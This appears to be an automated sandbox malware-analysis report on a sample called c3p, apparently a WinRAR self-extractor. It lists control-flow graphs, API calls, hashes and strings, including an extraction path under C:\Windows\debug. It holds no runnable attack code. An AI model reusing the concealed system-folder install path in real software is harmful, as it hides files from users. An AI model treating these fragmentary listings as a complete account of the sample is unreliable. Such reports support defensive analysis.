                                                    • API ID: FileFind$ErrorFirstLast$Next
                                                    • String ID:
                                                    • API String ID: 869497890-0
                                                    • Opcode ID: ee9851f39f08c8d6804640da5d00177b9fd110d66d07a9fe74aee9f42dd749c7
                                                    • Instruction ID: d66c3d4b50ebb1e5a018f37309fca25f090515eea953c64df4cd569b2ef175e5
                                                    • Opcode Fuzzy Hash: ee9851f39f08c8d6804640da5d00177b9fd110d66d07a9fe74aee9f42dd749c7
                                                    • Instruction Fuzzy Hash: 44412F71501658ABCB20DF68CC84ADB77F8EF49350F104AAAF96DE2291D774AAC4CF14
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _memset
                                                    • String ID:
                                                    • API String ID: 2102423945-0
                                                    • Opcode ID: f0a80f72d4bda3af986183644c09d2b427bd67fc9bb1789ef1810eb95b7ac04b
                                                    • Instruction ID: b165ab02d60b62349efe5e82d4abbb2873ee68c43ff350902ee758b64aec6057
                                                    • Opcode Fuzzy Hash: f0a80f72d4bda3af986183644c09d2b427bd67fc9bb1789ef1810eb95b7ac04b
                                                    • Instruction Fuzzy Hash: 7C92B6B09087859FCB29CF34C4D06E9BBF1AF55308F18C59ED89A8B342D738A985CB55

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 40f277-40f2aa call 41a05c call 41a670 call 40608b 7 40f2b4-40f2bd 0->7 8 40f2ac-40f2af 0->8 10 40f2c3-40f2c4 7->10 11 40f85a-40f86d 7->11 9 40fb2c-40fb39 8->9 12 40f2d5-40f2d7 10->12 13 40f2c6-40f2cb 10->13 14 40f87e-40f885 11->14 15 40f86f-40f878 SendMessageW 11->15 18 40fb2b 12->18 16 40f332-40f34e GetDlgItemTextW 13->16 17 40f2cd-40f2ce 13->17 19 40f897-40f8e2 call 40d8b2 GetDlgItem SendMessageW call 419819 GetDlgItem 14->19 20 40f887-40f891 SendDlgItemMessageW 14->20 15->14 24 40f350-40f356 16->24 25 40f366-40f36c 16->25 21 40f2d0-40f2d3 17->21 22 40f30e-40f31b 17->22 18->9 53 40f8e4 19->53 54 40f8ea-40f91d SetWindowTextW call 419830 call 40e449 19->54 20->19 21->12 28 40f2dc-40f2f3 call 40c0b2 call 4050a4 21->28 30 40f321-40f327 22->30 31 40f708 22->31 32 40f358 24->32 33 40f35f-40f361 24->33 26 40f37d-40f38f GetDlgItem 25->26 27 40f36e-40f378 25->27 36 40f391-40f3b2 SendMessageW * 2 26->36 37 40f3b7-40f3c6 SetFocus 26->37 35 40f7e5-40f7eb 27->35 40 40f710-40f713 28->40 61 40f2f9-40f309 SetDlgItemTextW 28->61 30->40 41 40f32d 30->41 34 40f709-40f70a EndDialog 31->34 32->33 33->34 34->40 45 40f7f1-40f7f7 35->45 46 40f9f3-40f9fb EndDialog 35->46 36->37 42 40f3d4-40f41b call 410792 call 40da6f call 40c0b2 call 401b7b 37->42 43 40f3c8-40f3d2 call 40c0b2 37->43 40->18 41->31 60 40f421-40f42e call 40cf89 42->60 43->60 45->46 50 40f7fd-40f81f call 40c0b2 SetDlgItemTextW 45->50 52 40fb29 46->52 67 40f821-40f826 50->67 68 40f828-40f834 50->68 52->18 53->54 74 40f92d-40f933 54->74 75 40f91f-40f928 call 40e541 54->75 76 40f430-40f437 call 40d77d 60->76 77 40f43c-40f44e call 4090e7 60->77 61->40 72 40f83a-40f855 call 40c0b2 * 2 MessageBoxW 67->72 68->72 72->52 83 40f961-40f963 74->83 84 40f935-40f95f call 40c0b2 SetDlgItemTextW call 40c0b2 SetDlgItemTextW 74->84 75->74 76->77 94 40f450-40f459 GetLastError 77->94 95 40f464-40f475 call 419806 77->95 91 40f964-40f96a 83->91 84->91 96 40f970-40f978 call 40e541 91->96 97 40fa0d-40fa13 91->97 99 40f460 94->99 100 40f45b-40f45e 94->100 111 40f486-40f48c 95->111 112 40f477-40f480 GetLastError 95->112 108 40f97d-40f984 96->108 103 40fab6-40fabd 97->103 104 40fa19-40fa1f 97->104 99->95 100->95 100->99 105 40fac9-40facf 103->105 106 40fabf-40fac3 EnableWindow 103->106 104->103 110 40fa25-40fa2b 104->110 114 40fad1-40fade call 406048 * 2 105->114 115 40fae3-40faea 105->115 106->105 116 40f9b1-40f9b7 108->116 117 40f986-40f98c 108->117 110->103 113 40fa31-40fa3f 110->113 121 40f4f6-40f4f9 111->121 122 40f48e-40f491 111->122 112->111 119 40f482 112->119 120 40fa42-40fa45 113->120 114->115 126 40faec-40faf2 115->126 127 40fb0e-40fb14 115->127 124 40fa00-40fa08 call 40e541 116->124 125 40f9b9-40f9c6 SetForegroundWindow 116->125 117->116 118 40f98e-40f9b0 call 41961b call 41a086 117->118 118->116 119->111 131 40fa47-40fa4d 120->131 132 40fa4f-40fa56 120->132 128 40f718-40f760 call 406066 * 2 call 406048 call 406066 SetDlgItemTextW GetDlgItem 121->128 129 40f4ff-40f505 121->129 133 40f493-40f4cc GetTickCount call 401b7b call 40851e call 4086bb 122->133 134 40f50a-40f514 122->134 124->97 125->124 136 40f9c8-40f9ce 125->136 126->127 137 40faf4-40fafe 126->137 127->52 139 40fb16-40fb23 call 40c0b2 SetDlgItemTextW 127->139 202 40f762-40f776 GetWindowLongW SetWindowLongW 128->202 203 40f77c-40f7b7 call 40e541 * 2 call 40dfc8 call 40e541 128->203 129->134 140 40f507 129->140 131->132 142 40fa8a-40fa94 131->142 145 40fa60-40fa89 call 41a349 call 40c0b2 call 41a349 132->145 146 40fa58-40fa5e 132->146 186 40f4d1-40f4d6 133->186 143 40f6b0-40f702 call 40c0b2 call 401b7b call 406257 call 40c0b2 MessageBoxW 134->143 144 40f51a-40f5c9 GetModuleFileNameW call 40cced call 401b7b CreateFileMappingW 134->144 136->124 149 40f9d0-40f9ea DialogBoxParamW 136->149 150 40fb00-40fb06 SendMessageW 137->150 151 40fb08 PostMessageW 137->151 139->52 140->134 142->120 157 40fa96-40fab5 call 41961b 142->157 143->31 182 40f5cb-40f5d9 GetCommandLineW 144->182 183 40f62f-40f65f ShellExecuteExW call 40cc96 * 2 144->183 145->142 146->142 146->145 149->124 161 40f9ec 149->161 150->127 151->127 157->103 161->46 190 40f5eb-40f62c call 40cf03 * 3 MapViewOfFile call 41be10 182->190 191 40f5db-40f5e6 call 410792 182->191 211 40f690 183->211 212 40f661-40f66f WaitForInputIdle 183->212 193 40f4e7-40f4f1 call 408a05 186->193 194 40f4d8-40f4e1 GetLastError 186->194 190->183 191->190 193->121 194->193 200 40f4e3 194->200 200->193 202->203 230 40f7d7-40f7df call 406048 203->230 231 40f7b9-40f7bf 203->231 217 40f694-40f697 211->217 216 40f671-40f676 212->216 220 40f686-40f68e 216->220 221 40f678-40f684 Sleep 216->221 222 40f699-40f6a5 UnmapViewOfFile CloseHandle 217->222 223 40f6ab-40f6ae 217->223 220->217 221->216 221->220 222->223 223->31 223->143 230->35 231->230 232 40f7c1-40f7c7 231->232 232->230 234 40f7c9-40f7d2 call 40e541 232->234 234->230
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID: "%s"%s$-el -s2 "-d%s" "-p%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp$z(D
                                                    • API String ID: 3519838083-1299667913
                                                    • Opcode ID: 50c944e4c2afe0530948b73b66513e9778a7e67b9b417df9aba9980627aa54f5
                                                    • Instruction ID: d496d710f2a45ca64884dc54fcd9ade419b820f81efa952dde0f9a3a7b54c10c
                                                    • Opcode Fuzzy Hash: 50c944e4c2afe0530948b73b66513e9778a7e67b9b417df9aba9980627aa54f5
                                                    • Instruction Fuzzy Hash: 7322E171540244FFEB31BFA19D85E9E3A68EB05304F40403BFA05B61D1DB7949A9CB6E

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 237 40e541-40e559 call 41a05c call 41a670 242 40f11e-40f129 237->242 243 40e55f-40e585 call 40d472 237->243 243->242 246 40e58b-40e58e 243->246 247 40e593-40e5ad 246->247 248 40e5b4-40e5c7 call 40d9a9 247->248 251 40e5c9 248->251 252 40e5cd-40e5e5 call 4119e6 251->252 255 40e5f5-40e5f9 252->255 256 40e5e7-40e5ee 252->256 258 40f0ef-40f115 call 40d472 255->258 259 40e5ff-40e602 255->259 256->252 257 40e5f0 256->257 257->258 258->247 273 40f11b-40f11d 258->273 261 40e7f0-40e7f4 259->261 262 40e8b1-40e8b5 259->262 263 40e892-40e896 259->263 264 40e609-40e60d 259->264 261->258 265 40e7fa-40e809 261->265 262->258 268 40e8bb-40e8c3 262->268 263->258 267 40e89c-40e8ac SetWindowTextW 263->267 264->258 269 40e613-40e67d call 419819 call 409ea2 call 4091bb call 4091e4 call 40660a call 409396 264->269 271 40e818-40e81c 265->271 272 40e80b-40e817 call 41a349 265->272 267->258 268->258 274 40e8c9-40e8e3 268->274 338 40e683 269->338 339 40e7dc-40e7eb call 4091d1 269->339 277 40e826-40e82e call 40d61e 271->277 278 40e81e-40e824 271->278 272->271 273->242 279 40e8e5-40e8eb 274->279 280 40e8ee-40e8f7 call 41a32f 274->280 284 40e830-40e834 277->284 278->284 279->280 280->258 291 40e8fd-40e904 280->291 289 40e836-40e838 284->289 290 40e83a-40e846 call 41a32f 284->290 293 40e848-40e86c call 41a32f call 41a114 289->293 290->293 295 40e920-40e924 291->295 296 40e906-40e90b 291->296 317 40e873-40e880 call 41a349 293->317 318 40e86e-40e870 293->318 303 40ea05 295->303 304 40e92a-40e92d 295->304 296->295 301 40e90d-40e914 296->301 301->258 306 40e91a-40e91b 301->306 310 40ea06-40ea0d call 41a377 303->310 308 40e93a-40e954 RegOpenKeyExW 304->308 309 40e92f-40e934 304->309 306->310 313 40e956-40e990 RegQueryValueExW RegCloseKey 308->313 314 40e99f-40e9a7 308->314 309->303 309->308 316 40ea12-40ea13 310->316 320 40e992 313->320 321 40e995-40e997 313->321 322 40e9d4-40e9f2 call 41a32f * 2 314->322 323 40e9a9-40e9bf call 41a32f 314->323 325 40ea14-40ea26 call 41c60f 316->325 317->258 336 40e886-40e88d call 41a086 317->336 318->317 320->321 321->314 322->325 351 40e9f4-40ea03 call 41a349 322->351 323->322 334 40e9c1-40e9d3 call 41a349 323->334 341 40ea34-40ea82 call 41a377 call 40d807 GetDlgItem SetWindowTextW SendMessageW call 41a5a1 325->341 342 40ea28-40ea2d 325->342 334->322 336->258 345 40e688-40e69e SetFileAttributesW 338->345 339->258 374 40ea87-40ea8b 341->374 342->341 348 40ea2f-40ea31 342->348 352 40e6a4-40e6d8 call 40a52d call 409e72 call 41a32f 345->352 353 40e746-40e752 GetFileAttributesW 345->353 348->341 351->316 379 40e6da-40e6ea call 41a32f 352->379 380 40e6ec-40e6fa call 409e2c 352->380 355 40e7c0-40e7d6 call 409396 353->355 356 40e754-40e763 DeleteFileW 353->356 355->339 355->345 356->355 361 40e765-40e769 356->361 366 40e771-40e795 call 401b7b GetFileAttributesW 361->366 376 40e797-40e7ad MoveFileW 366->376 377 40e76b-40e76e 366->377 374->258 378 40ea91-40eaa6 SendMessageW 374->378 376->355 381 40e7af-40e7ba MoveFileExW 376->381 377->366 378->258 379->380 386 40e700-40e740 call 41a32f call 41a3a0 SHFileOperationW 379->386 380->339 380->386 381->355 386->353
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 0040E546
                                                      • Part of subcall function 0040D472: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0040D520
                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,00000800,?,00000000,75A45540,?,0040F22B,?,00000003), ref: 0040E691
                                                    • _wcslen.LIBCMT ref: 0040E6CC
                                                    • _wcslen.LIBCMT ref: 0040E6E1
                                                    • _wcslen.LIBCMT ref: 0040E707
                                                    • _memset.LIBCMT ref: 0040E71D
                                                    • SHFileOperationW.SHELL32 ref: 0040E740
                                                    • GetFileAttributesW.KERNEL32(?), ref: 0040E74D
                                                    • DeleteFileW.KERNEL32(?), ref: 0040E75B
                                                    • _wcscat.LIBCMT ref: 0040E811
                                                    • _wcslen.LIBCMT ref: 0040E849
                                                    • _realloc.LIBCMT ref: 0040E85B
                                                    • _wcscat.LIBCMT ref: 0040E875
                                                    • SetWindowTextW.USER32(?,?), ref: 0040E8A6
                                                    • _wcslen.LIBCMT ref: 0040E8EF
                                                    • _wcscpy.LIBCMT ref: 0040EA0D
                                                    • _wcsrchr.LIBCMT ref: 0040EA1D
                                                    • _wcscpy.LIBCMT ref: 0040EA3C
                                                    • GetDlgItem.USER32(?,00000066), ref: 0040EA55
                                                    • SetWindowTextW.USER32(00000000,?), ref: 0040EA65
                                                    • SendMessageW.USER32(00000000,00000143,00000000,%s.%d.tmp), ref: 0040EA74
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0040EAA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$File$AttributesMessageSendTextWindow_wcscat_wcscpy$DeleteEnvironmentExpandH_prologItemOperationStrings_memset_realloc_wcsrchr
                                                    • String ID: "$%s.%d.tmp$<br>$C:\Windows\debug\c3p$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$\
                                                    • API String ID: 3339014310-191996915
                                                    • Opcode ID: 1ecbdf8059d576a3421a046d5446c4f736839f8ebacfa9af43f8436be51fa22c
                                                    • Instruction ID: b670f3089cf1993bfa594e3b9b93eeee7edc8de7fb1b22754e54a4710f6d7265
                                                    • Opcode Fuzzy Hash: 1ecbdf8059d576a3421a046d5446c4f736839f8ebacfa9af43f8436be51fa22c
                                                    • Instruction Fuzzy Hash: 0CF150B1900219ABDF20DBA1DC45FEE7378BB04304F4448BBF615B21D1EB789AA58B59

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00410A29: GetModuleHandleW.KERNEL32(kernel32,0040FB4C,00000001), ref: 00410A2E
                                                      • Part of subcall function 00410A29: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00410A3E
                                                    • OleInitialize.OLE32(00000000), ref: 0040FB4F
                                                      • Part of subcall function 00411ADC: GetCPInfo.KERNEL32(00000000,?,?,?,?,0040FB5F), ref: 00411AED
                                                      • Part of subcall function 00411ADC: IsDBCSLeadByte.KERNEL32(00000000), ref: 00411B01
                                                    • _memset.LIBCMT ref: 0040FB6B
                                                    • GetCommandLineW.KERNEL32 ref: 0040FB73
                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0040FB99
                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007002), ref: 0040FBAB
                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040FBD4
                                                      • Part of subcall function 0040D2E8: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0040D301
                                                      • Part of subcall function 0040D2E8: SetEnvironmentVariableW.KERNEL32(sfxpar,00000002,00000000,00000000,?,?,00000400), ref: 0040D334
                                                    • CloseHandle.KERNEL32(?), ref: 0040FBDD
                                                    • GetModuleFileNameW.KERNEL32(00000000,00438820,00000800), ref: 0040FBF7
                                                    • SetEnvironmentVariableW.KERNELBASE(sfxname,00438820), ref: 0040FC03
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040FC0A
                                                    • LoadIconW.USER32 ref: 0040FC21
                                                    • LoadBitmapW.USER32 ref: 0040FC34
                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,0040F277,00000000), ref: 0040FC93
                                                    • DeleteObject.GDI32 ref: 0040FCF4
                                                    • DeleteObject.GDI32(?), ref: 0040FD00
                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040FD3D
                                                    • Sleep.KERNELBASE(?), ref: 0040FD4D
                                                    • OleUninitialize.OLE32 ref: 0040FD53
                                                      • Part of subcall function 0040D33C: CharUpperW.USER32(?,?,?,?,00000400), ref: 0040D39D
                                                      • Part of subcall function 0040D33C: CharUpperW.USER32(?,?,?,?,?,00000400), ref: 0040D3C4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: FileHandle$EnvironmentModuleVariable$CharCloseDeleteLoadObjectUpperView$AddressBitmapByteCommandDialogIconInfoInitializeLeadLineMappingNameOpenParamProcSleepUninitializeUnmap_memset
                                                    • String ID: STARTDLG$sfxname$winrarsfxmappingfile.tmp
                                                    • API String ID: 3055076122-2503671248
                                                    • Opcode ID: 80d8d67f2e6fa4c10a6e294ca0b7efc422330e329f37fa9ff12ea617a8ed5fff
                                                    • Instruction ID: 07e57f878e52c542eb39bc778af8a53b11ad9cd4a6be2924e4f7471581548559
                                                    • Opcode Fuzzy Hash: 80d8d67f2e6fa4c10a6e294ca0b7efc422330e329f37fa9ff12ea617a8ed5fff
                                                    • Instruction Fuzzy Hash: D051D870A01208EFC720BFA1ED89D5E3BA9EB45314B50443FF901A32A1DB785955CBAE

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 453 40b925-40b950 call 41a05c call 41a670 call 41c5e9 460 40b952-40b972 GetModuleFileNameW call 41c60f 453->460 461 40b97b-40b9ad call 41a377 call 40851e call 40855b 453->461 466 40bc01-40bc0d 460->466 467 40b978 460->467 472 40b9c3-40b9cd 461->472 473 40b9af-40b9be call 408a05 461->473 467->461 475 40b9ce-40b9d2 472->475 479 40bc00 473->479 477 40b9d8-40b9f8 call 408936 call 408c03 475->477 478 40baef-40bb16 call 408d75 call 41cafe 475->478 486 40b9fd-40ba07 477->486 488 40bbf6-40bbff call 408a05 478->488 489 40bb1c-40bb2e call 408c03 478->489 479->466 490 40babb-40badf call 408d75 486->490 491 40ba0d-40ba17 486->491 488->479 503 40bb30-40bb35 489->503 504 40bb37-40bb46 call 41cafe 489->504 490->475 507 40bae5-40bae9 490->507 494 40ba19-40ba21 491->494 495 40ba3e-40ba42 491->495 494->495 499 40ba23-40ba3c call 41cbc8 494->499 500 40ba70-40ba73 495->500 501 40ba44-40ba50 495->501 499->495 519 40bab3-40bab8 499->519 508 40ba75-40ba7d 500->508 509 40ba9e-40baa7 500->509 501->500 506 40ba52-40ba5a 501->506 511 40bb6c-40bb76 503->511 516 40bbf0 504->516 524 40bb4c-40bb6a call 4116c2 call 41a086 504->524 506->500 515 40ba5c-40ba6e call 41c3dc 506->515 507->478 507->516 508->509 510 40ba7f-40ba98 call 41cbc8 508->510 509->491 512 40baad 509->512 510->509 510->516 521 40bb78 511->521 522 40bb7a-40bb87 511->522 512->490 515->500 530 40baaf 515->530 516->488 519->490 521->522 526 40bbe5-40bbed 522->526 527 40bb89-40bb93 522->527 524->511 526->516 527->526 528 40bb95-40bb99 527->528 531 40bb9b-40bba2 528->531 532 40bbcc-40bbd0 528->532 530->519 534 40bba4-40bba7 531->534 535 40bbc7 531->535 537 40bbd2-40bbd6 532->537 538 40bbd8 532->538 539 40bbc3-40bbc5 534->539 540 40bba9-40bbac 534->540 541 40bbc9-40bbca 535->541 537->538 543 40bbdb-40bbe3 537->543 544 40bbda 538->544 539->541 545 40bbae-40bbb1 540->545 546 40bbbf-40bbc1 540->546 541->544 543->526 543->527 544->543 547 40bbb3-40bbb5 545->547 548 40bbbb-40bbbd 545->548 546->541 547->543 549 40bbb7-40bbb9 547->549 548->541 549->541
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 0040B92A
                                                    • _wcschr.LIBCMT ref: 0040B941
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,004325BC,0040C0A7,0040FC52,00438820,0040FC52,00438820), ref: 0040B95A
                                                    • _wcsrchr.LIBCMT ref: 0040B969
                                                    • _wcscpy.LIBCMT ref: 0040B97F
                                                    • _malloc.LIBCMT ref: 0040BB06
                                                      • Part of subcall function 00408936: SetFilePointer.KERNELBASE(?,00000000,?,00000001), ref: 00408969
                                                      • Part of subcall function 00408936: GetLastError.KERNEL32(?,?), ref: 00408976
                                                    • _strncmp.LIBCMT ref: 0040BA32
                                                    • _strncmp.LIBCMT ref: 0040BA8E
                                                    • _malloc.LIBCMT ref: 0040BB3C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: File_malloc_strncmp$ErrorH_prologLastModuleNamePointer_wcschr_wcscpy_wcsrchr
                                                    • String ID: *messages***$*messages***$a
                                                    • API String ID: 644328012-1639468518
                                                    • Opcode ID: d5bf116093e3753ee3e88e92be552364967f0fdb6f133d7e269eb3e93f4078ed
                                                    • Instruction ID: 336bd8d6889e5393640b6eb2f395195fd14860236c7930fcd7781f7bd21ec6d8
                                                    • Opcode Fuzzy Hash: d5bf116093e3753ee3e88e92be552364967f0fdb6f133d7e269eb3e93f4078ed
                                                    • Instruction Fuzzy Hash: AC81E0B1A002099BDB30DF64CC81BAA77B4EF10350F10417FE695B72D5EB789A84CA9D

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 550 40be4f-40beac call 40bd68 GetWindowRect GetClientRect 553 40beb2-40beb6 550->553 554 40bf4b-40bf54 550->554 557 40bebc-40befb 553->557 558 40bf8f 553->558 555 40bf94-40bfb3 GetSystemMetrics GetWindow 554->555 556 40bf56-40bf8d GetWindowTextW call 40bc10 SetWindowTextW 554->556 560 40c08c-40c08e 555->560 556->555 561 40befd 557->561 562 40beff-40bf01 557->562 558->555 563 40c094-40c098 560->563 564 40bfb8-40bfbf 560->564 561->562 566 40bf03 562->566 567 40bf05-40bf1c GetWindowLongW 562->567 564->563 570 40bfc5-40bfde GetWindowTextW 564->570 566->567 568 40bf25-40bf48 SetWindowPos GetWindowRect 567->568 569 40bf1e 567->569 568->554 569->568 571 40bfe0-40c000 call 40bc10 SetWindowTextW 570->571 572 40c006-40c00a 570->572 571->572 574 40c076-40c087 GetWindow 572->574 575 40c00c-40c070 GetWindowRect SetWindowPos 572->575 574->563 576 40c089 574->576 575->574 576->560
                                                    APIs
                                                      • Part of subcall function 0040BD68: _wcschr.LIBCMT ref: 0040BD98
                                                    • GetWindowRect.USER32 ref: 0040BE78
                                                    • GetClientRect.USER32 ref: 0040BE85
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040BF11
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040BF35
                                                    • GetWindowRect.USER32 ref: 0040BF42
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0040BF61
                                                    • SetWindowTextW.USER32(?,?), ref: 0040BF87
                                                    • GetSystemMetrics.USER32 ref: 0040BF96
                                                    • GetWindow.USER32 ref: 0040BFA3
                                                    • GetWindowTextW.USER32(00000000,?,00000400), ref: 0040BFD0
                                                    • SetWindowTextW.USER32(00000000,00000000), ref: 0040C000
                                                    • GetWindowRect.USER32 ref: 0040C013
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000110,00000000,00000110,00000204), ref: 0040C070
                                                    • GetWindow.USER32 ref: 0040C07B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: Window$RectText$ClientLongMetricsSystem_wcschr
                                                    • String ID:
                                                    • API String ID: 4134264131-0
                                                    • Opcode ID: 08dc7c77311b924382860ca2428d645387aaf5d18714a7fe9270ec02dbb33203
                                                    • Instruction ID: b2f518587ff17eba686361831e3fb2fb58f6033ecb525b18cd3b9a79a0b47dd9
                                                    • Opcode Fuzzy Hash: 08dc7c77311b924382860ca2428d645387aaf5d18714a7fe9270ec02dbb33203
                                                    • Instruction Fuzzy Hash: 99711971A00219AFDF10DFE8CC89AEEBBB9FB08314F048129F915F61A0D7759A55CB94

                                                    Control-flow Graph

                                                    APIs
                                                    • GetDlgItem.USER32(00000068,00000000), ref: 0040CF9A
                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040D0D7,00000001,?,?,0040DFB7,0042A830,0044BF30,0044BF30,00001000), ref: 0040CFC7
                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0040CFD3
                                                    • SendMessageW.USER32(00000000,000000C2,00000000,0042A724), ref: 0040CFE2
                                                    • SendMessageW.USER32(004012F5,000000B1,05F5E100,05F5E100), ref: 0040CFF6
                                                    • SendMessageW.USER32(004012F5,0000043A,00000000,?), ref: 0040D00D
                                                    • SendMessageW.USER32(004012F5,00000444,00000001,0000005C), ref: 0040D048
                                                    • SendMessageW.USER32(004012F5,000000C2,00000000,00000456), ref: 0040D057
